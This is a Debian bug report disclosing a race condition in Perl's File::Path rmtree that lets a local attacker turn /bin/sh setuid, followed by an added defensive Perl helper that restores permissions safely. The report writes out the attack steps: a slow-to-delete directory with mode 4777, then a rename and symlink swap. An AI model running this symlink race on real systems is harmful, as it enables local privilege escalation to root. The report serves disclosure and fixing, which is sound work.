Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole

Noting USN-44-1 e.g. in I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:

    (undef, undef, my $rp) = lstat $root or next;
    $rp &= 07777;   # don't forget setuid, setgid, sticky bits
    if ( -d _ ) {
    ...
            if (rmdir $root) {
                ++$count;
            }
            else {
                carp "Can't remove directory $root: $!";
                chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root))
                    or carp("and can't restore permissions to "
                            . sprintf("0%o",$rp) . "\n");
            }
        }
    ...

Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:

    mkdir -p /tmp/psz/sh
    perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
    chmod 4777 /tmp/psz/sh

While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:

    mv /tmp/psz/sh /tmp/psz/dummy
    ln -s /bin/sh /tmp/psz/sh

Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.

I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.

(A few minutes ago I emailed the File::Path authors Tim.Bunce@ig.co.uk
and bailey@newman.upenn.edu; Tim.Bunce bounced.)

Cheers,

Paul Szabo - psz@maths.usyd.edu.au
School of Mathematics and Statistics
University of Sydney 2006 Australia

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages perl-modules depends on:
ii  perl  5.6.1-8.7  Larry Wall's Practical Extraction
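
An added example, not part of the original report and not File::Path's own code: one way to restore the recorded mode so that it can only land on the directory that the earlier lstat saw, by recording device/inode and using fchmod on a handle opened without following links. The helper name restore_mode_safely and the temporary paths are hypothetical; it assumes a platform that provides O_NOFOLLOW, O_DIRECTORY and fchmod(2).

```perl
use strict;
use warnings;
use Fcntl qw(O_RDONLY O_NOFOLLOW O_DIRECTORY);
use File::Temp qw(tempdir);

# Hypothetical helper (not part of File::Path): put $mode back on $path only
# if $path is still the directory whose device/inode the earlier lstat saw.
sub restore_mode_safely {
    my ($path, $dev, $ino, $mode) = @_;
    # O_NOFOLLOW: fail if the final component is now a symlink.
    # O_DIRECTORY: fail if it is no longer a directory.
    sysopen(my $fh, $path, O_RDONLY | O_NOFOLLOW | O_DIRECTORY)
        or return "refused, cannot open without following links: $!";
    my ($d, $i) = stat $fh
        or return "refused, fstat failed: $!";
    # Also catches a swapped parent directory: the opened object is compared.
    return "refused, device/inode changed since lstat"
        unless $d == $dev && $i == $ino;
    # chmod on a filehandle calls fchmod(2), so it changes the inode that was
    # opened and checked, not whatever the name resolves to at this moment.
    chmod($mode, $fh) or return "refused, fchmod failed: $!";
    return "restored";
}

# Constructed scenario inside a private temporary directory.
my $tmp    = tempdir(CLEANUP => 1);
my $dir    = "$tmp/sh";
my $victim = "$tmp/victim";          # stands in for the symlink target
mkdir $dir, 0755 or die "mkdir: $!";
open(my $v, '>', $victim) or die "open: $!";
close $v;
chmod 0644, $victim or die "chmod: $!";

# What the cleanup code records up front: identity as well as mode bits.
my ($dev, $ino, $rp) = lstat $dir or die "lstat: $!";
$rp &= 07777;

print "unchanged tree: ", restore_mode_safely($dir, $dev, $ino, $rp), "\n";

# The name is re-pointed between the lstat and the restore.
rename $dir, "$tmp/dummy" or die "rename: $!";
symlink $victim, $dir or die "symlink: $!";

print "after the swap: ", restore_mode_safely($dir, $dev, $ino, $rp), "\n";
printf "victim mode is still 0%o\n", (stat $victim)[2] & 07777;
```

A non-root caller needs read permission on the directory for the open to succeed; the check covers only the permission-restore step, not the rest of the tree walk.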